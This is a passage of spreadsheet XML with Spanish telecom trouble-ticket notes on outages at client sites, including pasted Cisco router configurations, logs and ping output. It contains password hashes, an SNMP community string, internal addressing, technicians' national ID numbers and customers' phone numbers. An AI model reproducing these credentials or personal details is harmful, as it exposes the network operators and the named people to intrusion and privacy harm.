BUENAS NOCHES ESTIMADO,
SE ADJUNTAN DATOS SOLICITADOS,
DUI                     CÓDIGO             NOMBRE
00354722-1      4378                 RONAL MOREL CRESPIN
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA LA GESTION DE PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 17:23
PARA: ERNESTO RUBIO &lt;ERNESTO.RUBIO@DAVIVIENDA.COM.SV&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;
ASUNTO: SOLICITUD DE PERMISOS || BANCO DAVIVIENDA SALVADORENO S.A. || IP2037200SV || SD1127715
BUENA TARDE
    SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
SV4378 RONALD CRESPIN 78428653
ADJUNTO INFORMACIÓN DE QUIENES HAN SIDO ASIGNADOS A LA REVISIÓN Y RESOLUCIÓN DE FALLA, FAVOR COORDINAR VISITA PARA MAÑANA SÁBADO A LAS 8:00 HORAS AL MISMO TIEMPO INFORMAR A ENCARGADOS DE BRINDAR ACCESO PARA AGILIZAR LOS PROCESOS, QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4571824</t>
  </si>
  <si>
    <t xml:space="preserve"> ALBERTO TRUJILLO AMATITLAN: TENEMOS CORTE DE FIBRA A 90 METROS YA VIENEN LOS DE FIBRA EN CAMINO  SE BIRNDARAN AVENCES EN UNA HORA</t>
  </si>
  <si>
    <t>F4571825</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERNESTO RUBIO AL 503) 2556-2049 CONFIRMA SERVICIO ESTABLE Y OPERATIVO SOLO SOLICITA DETALLE DE LA FALLA VIA CORREO**
ID 1001937539
**</t>
  </si>
  <si>
    <t>F4571832</t>
  </si>
  <si>
    <t>ENLACE OPERATIVO SE PORCEDE CON CIERRE DE TICKET
&lt;IPBAGTPBN1D1A10A02EIM4&gt;PING -VPN-INSTANCE  UNICOMER2 10.72.210.85
  PING 10.72.210.85: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.72.210.85: BYTES=56 SEQUENCE=1 TTL=255 TIME=2 MS
    REPLY FROM 10.72.210.85: BYTES=56 SEQUENCE=2 TTL=255 TIME=2 MS
    REPLY FROM 10.72.210.85: BYTES=56 SEQUENCE=3 TTL=255 TIME=3 MS
    REPLY FROM 10.72.210.85: BYTES=56 SEQUENCE=4 TTL=255 TIME=2 MS
    REPLY FROM 10.72.210.85: BYTES=56 SEQUENCE=5 TTL=255 TIME=3 MS
  --- 10.72.210.85 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/3 MS
&lt;IPBAGTPBN1D1A10A02EIM4&gt;</t>
  </si>
  <si>
    <t>F4571835</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ALEXIS NUÑEZ 74695247 CLIENTE COMENTA QUE NO SE ENCUENTRA EN EL SITIO PARA HACER PRUEBAS, ESTA AVERIGUANDO SI HAY ALGUIEN EN SUS OFICINA QUE NOS APOYE, INDICA QUE DEVOLVERÁ LA LLAMADA EN BREVE. 1001314998</t>
  </si>
  <si>
    <t>INFORMA ALEXIS NUÑEZ 74695247 QUE EL DÍA DE HOY NO LABORAN EN LA AGENCIA, POR LO QUE SOLICITA SE LE DE SEGUIMIENTO EL DÍA LUNES 23/05 A LAS 8:30 AM PARA REALIZAR PRUEBAS. 1001347176</t>
  </si>
  <si>
    <t>F4571836</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PROCEDE CON CIERRE POS CIERRE DE FALLA MASIVA.
ROUTER CPE ACTIVO HACE 1 SEMANA.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WALMART_GT_TIENDA_4295 UPTIME IS 1 WEEK, 2 DAYS, 22 HOURS, 34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844838S
2 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250880K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1941/K9          FTX1844838S
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_WALMART_GT_TIENDA_4295#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3178 BYTES
!
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_WALMART_GT_TIENDA_4295
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$H9YJ$YNTTT.6EMLS4.5AVGZJIL.
!
NO AAA NEW-MODEL
!
IP CEF
!
!
!
!
!
!
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX1844838S
!
!
USERNAME GESTIONIP SECRET 5 $1$FOTI$B3BCFKQMEFVPTEUS1GJ0K.
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO_CLARO
 IP ADDRESS 10.212.130.215 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/344400229T/_/
 BANDWIDTH 3072
 IP ADDRESS 10.72.102.13 255.255.255.240
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN_CLIENTE_DESPENSA _FAMILIAR_EL_ESTOR
 IP ADDRESS 22.48.3.178 255.255.255.252
 RATE-LIMIT INPUT 3072000 576000 1152000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 3072000 576000 1152000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 IP OSPF NETWORK POINT-TO-POINT
 IP OSPF DEAD-INTERVAL 30
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
ROUTER OSPF 2
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC SUBNETS
 REDISTRIBUTE OSPF 1 METRIC 20 SUBNETS
 NETWORK 22.48.3.176 0.0.0.3 AREA 0
 DEFAULT-INFORMATION ORIGINATE
!
ROUTER OSPF 1
 ROUTER-ID 10.72.102.13
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC SUBNETS
 REDISTRIBUTE OSPF 2 SUBNETS
 NETWORK 10.72.102.0 0.0.0.15 AREA 0
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION DF EL ESTOR 7 AVENIDA ENTRE 1 Y 2 CALLE ZONA 1 EL ESTOR IZABAL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WALMART_GT_TIENDA_4295#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 62 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 62 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 65 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
*JAN  2 00:00:02.647: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*MAY 11 05:30:34.623: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*MAY 11 05:30:47.003: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 11 05:30:47.003: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 11 05:30:48.167: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 11 05:30:48.167: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 11 05:30:49.339 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*MAY 11 05:30:50.223 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*MAY 11 05:30:51.239 UTC: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 11 05:30:52.163 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(4)M6A, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED TUE 15-APR-14 03:31 BY PROD_REL_TEAM
*MAY 11 05:30:52.207 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_WALMART_GT_TIENDA_4295 IS UNDERGOING A COLD START
*MAY 11 05:30:52.827 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*MAY 11 05:31:44.059 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.102.1 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
*MAY 11 05:31:54.011 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 11 05:31:55.011 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 11 05:32:30.855 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.54.79.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
*MAY 15 22:03:42.328 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.102.1 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
*MAY 15 22:24:15.975 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 15 22:24:16.975 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 15 22:24:20.975 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 15 22:24:21.975 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 15 22:27:08.975 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 15 22:27:09.975 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 15 22:27:13.975 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 15 22:27:14.975 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 15 22:53:20.975 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 15 22:53:21.975 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 15 22:53:44.983 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 15 22:53:47.975 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 15 22:53:55.975 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 15 22:53:56.975 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 16 02:44:45.054 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.102.1 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
*MAY 19 19:34:51.024 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.102.1 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
*MAY 19 19:35:49.448 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.102.1 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
*MAY 19 19:41:16.952 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 19 19:41:17.952 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 19 19:41:17.952 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.102.1 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
*MAY 19 19:41:26.952 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 19 19:41:27.952 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 19 19:41:57.244 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.102.1 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
*MAY 19 19:54:22.952 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 19 19:54:23.952 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 19 19:54:23.952 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.102.1 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
*MAY 19 19:55:30.960 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 19 19:55:31.960 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 19 19:55:33.952 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 19 19:55:34.952 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 19 19:55:42.952 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 19 19:55:43.952 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 19 19:56:49.156 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.102.1 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
*MAY 19 20:02:13.276 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.102.1 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
*MAY 19 20:03:18.444 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.102.1 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
*MAY 19 20:05:20.952 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 19 20:05:21.952 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 19 20:05:21.952 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.102.1 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: INTERFACE DOWN OR DETACHED
*MAY 19 20:06:04.952 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 19 20:06:05.952 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 19 20:06:28.112 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.102.1 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
*MAY 19 21:03:43.632 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.102.1 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
*MAY 19 21:07:17.616 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.102.1 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
*MAY 20 16:36:24.031 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.102.1 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
*MAY 20 17:56:45.955 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.102.1 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
CC_WALMART_GT_TIENDA_4295#
SHOW CLOCK
*04:04:33.668 UTC SAT MAY 21 2022
CC_WALMART_GT_TIENDA_4295#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.102.1             0   C4B8.B4DE.16B8  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.102.13            -   FC5B.391E.7B20  ARPA   GIGABITETHERNET0/0
INTERNET  22.48.3.177           194   7C69.F6BE.D260  ARPA   GIGABITETHERNET0/1
INTERNET  22.48.3.178             -   FC5B.391E.7B21  ARPA   GIGABITETHERNET0/1
CC_WALMART_GT_TIENDA_4295#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/344400229T/_/
GI0/1                          UP             UP       LAN_CLIENTE_DESPENSA _FAMILIAR_EL_ESTOR
LO5                            UP             UP       MONITOREO_CLARO
CC_WALMART_GT_TIENDA_4295#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.72.102.13    YES NVRAM  UP                    UP
GIGABITETHERNET0/1         22.48.3.178     YES NVRAM  UP                    UP
LOOPBACK5                  10.212.130.215  YES NVRAM  UP                    UP
CC_WALMART_GT_TIENDA_4295#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN WALLMART 10.72.102.13
  PING 10.72.102.13: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.102.13 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/3 MS
RUTA IP:
PE: 10.179.28.6
DISPLAY IP ROUTING-TABLE VPN-INSTANCE WALLMART 10.72.102.13
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : WALLMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.72.102.13/32  DIRECT  0    0                 0.0.0.0         VLANIF1795			</t>
  </si>
  <si>
    <t>F4571863</t>
  </si>
  <si>
    <t>CLIENTE 78608467 MARTIR GUARDADO ESTA MOVILIZANDOSE HACIA EL DATA CENTER. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE MIGUEL CALLES QUIEN INDICA QUE TIENE UN ASMI 54 Y SOBRE ESTE ASMI VA EL INTERNET Y LA TELEFONIA.
SE LE SOLICITO AL CLIENTE RESET DE LA PBX. CLIENTE INDICA QUE SE VA A COMUNICAR CON LA AGENCIA Y SOLICITA LLAMADA EN 20MIN.
1001271765
COLA:
NOMBRE: A: 0050376810422
NÚMERO: 0050376810422
DURACIÓN: 0:00:31
ESTADO: CONECTADA
DETALLES: 0050376810422
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 20/05/2022 16:56:57</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MIGUEL CALLES QUIEN INDICA QUE REINCIO SU PBX PERO EL SERVICIO NO LEVANTA. INDICA QUE SUS ENLACES DE INTERNET LOS LLEVA OTRO PROVEEDOR. SE LE SOLICITO REVISAR EL ASMI54.
1001279340
COLA:
NOMBRE: A: 0050376810422
NÚMERO: 0050376810422
DURACIÓN: 0:00:27
ESTADO: CONECTADA
DETALLES: 0050376810422
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 20/05/2022 17:33:37</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE MIGUEL CALLES 76810422 QUIEN ESTA INTENTANDO UBICAR EL CONTACTO EN EL PR PARA REVISAR EQUIPOS. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE MIGUEL CALLES 76810422 PARA VALIDAR SI YA REALIZARON EL REINICIO DE LA PBX
##LLAMADA DESDE  VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA NUEVAMENTE CON CLIENTE MIGUEL CALLES 76810422 PARA REALIZAR PRUEBAS REINICIANDO LA PBX, PERO SIGUE SIN CONTESTAR DESPUES DE 2 INTENTOS, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LE ENVIA CORREO AL CLIENTE Y SE QUEDA A LA ESPERA DE LA VISITA EL DIA LUNES 23/05 A LAS 8 HORAS.
CASO: SD1127730///23192450///ACACYPAC, NC DE R.L.
¿
MICROSOFT OUTLOOK
SÁB 21/05/2022 12:22
NO SE PUDO ENTREGAR A ESTOS DESTINATARIOS O GRUPOS: WALTER.REYNOSO@CLARO.COM.GT EL BUZÓN DE CORREO DEL DESTINATARIO ESTÁ LLENO Y NO PUEDE ACEPTAR MENSAJES POR EL MOMENTO. INTENTE REENVIAR EL MENSAJE MÁS TARDE O PÓNGASE EN CONTACTO CON EL DESTINATARIO DIRECTAMENTE.
ESVIN ANTONIO PAREDES SAMUY
ESTIMADO CLIENTE PARA LA REVISIÓN DEL E1
23192450
ACACYPAC, NC DE R.L.
SE ENVÍA LISTADO DE TÉCNICOS QUE PODRÁN ATENDER EL CASO EL DÍA LUNES 23/05 A LAS 8 HORAS, CUALQUIER TÉCNICO DEL SIGUIENTE LISTADO SE PRESENTARÁ A SUS INSTALACIONES.
00936126-7   MARIO ERNESTO CRUZ MARQUEZ
00354722-1   RONAL MOREL CRESPIN
00157708-4   ABRAHAM SAMUEL PEREZ
03245714-4   ADAN ERNESTO GONZALEZ
01968544-3   WALTER ERNESTO RODRIGUEZ PEREZ
01101266-2   JOSE SALVADOR PORTILLO VELASQUEZ
01907591-5   SAMUEL DE JESUS PEREZ LOPEZ
SALUDOS.</t>
  </si>
  <si>
    <t>F4571876</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PORCEDE CON CIERRE .
ROUTER CPE ACTIVO HACE 2 DÍ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GENESIS_245700130 UPTIME IS 2 DAYS, 4 HOURS, 3 MINUTES
UPTIME FOR THIS CONTROL PROCESSOR IS 2 DAYS, 4 HOURS, 5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33310V8
1 VIRTUAL ETHERNET INTERFACE
6 GIGABIT ETHERNET INTERFACES
32768K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
4194304K BYTES OF PHYSICAL MEMORY.
2945023K BYTES OF FLASH MEMORY AT BOOTFLASH:.
0K BYTES OF WEBUI ODM FILES AT WEBUI:.
CONFIGURATION REGISTER IS 0X2102
GENESIS_245700130#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 8039 BYTES
!
! LAST CONFIGURATION CHANGE AT 01:07:46 UTC THU MAY 19 2022
!
VERSION 16.10
SERVICE TIMESTAMPS DEBUG DATETIME MSEC
SERVICE TIMESTAMPS LOG DATETIME MSEC
SERVICE CALL-HOME
PLATFORM QFP UTILIZATION MONITOR LOAD 80
NO PLATFORM PUNT-KEEPALIVE DISABLE-KERNEL-CORE
!
HOSTNAME GENESIS_245700130
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
SECURITY AUTHENTICATION FAILURE RATE 3 LOG
ENABLE SECRET 9 $9$IV695KS6VLML2K$BXA.AEWDAU6LXQ9JVU5SDFRXF/IMNR/XCFHPSKMD2PE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3 WITHIN 60
LOGIN QUIET-MODE ACCESS-CLASS ACCESO
LOGIN ON-SUCCESS LOG
!
!
!
!
!
!
!
SUBSCRIBER TEMPLATING
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
CRYPTO PKI TRUSTPOINT TP-SELF-SIGNED-197236263
 ENROLLMENT SELFSIGNED
 SUBJECT-NAME CN=IOS-SELF-SIGNED-CERTIFICATE-197236263
 REVOCATION-CHECK NONE
 RSAKEYPAIR TP-SELF-SIGNED-197236263
!
CRYPTO PKI TRUSTPOINT SLA-TRUSTPOINT
 ENROLLMENT PKCS12
 REVOCATION-CHECK CRL
!
!
CRYPTO PKI CERTIFICATE CHAIN TP-SELF-SIGNED-197236263
 CERTIFICATE SELF-SIGNED 01
  3082032E 30820216 A0030201 02020101 300D0609 2A864886 F70D0101 05050030
  30312E30 2C060355 04031325 494F532D 53656C66 2D536967 6E65642D 43657274
  69666963 6174652D 31393732 33363236 33301E17 0D323030 35323831 34303033
  315A170D 33303031 30313030 30303030 5A303031 2E302C06 03550403 1325494F
  532D5365 6C662D53 69676E65 642D4365 72746966 69636174 652D3139 37323336
  32363330 82012230 0D06092A 864886F7 0D010101 05000382 010F0030 82010A02
  82010100 A23909D3 E937AA97 5E3BB179 20DA00B8 D1BD1A1B F35A9266 6AC2DD5E
  51B94DFE 4CB04753 8D262F6C FFB277FB 43BECA41 8CF6415E 8432BC37 F6CA5DA6
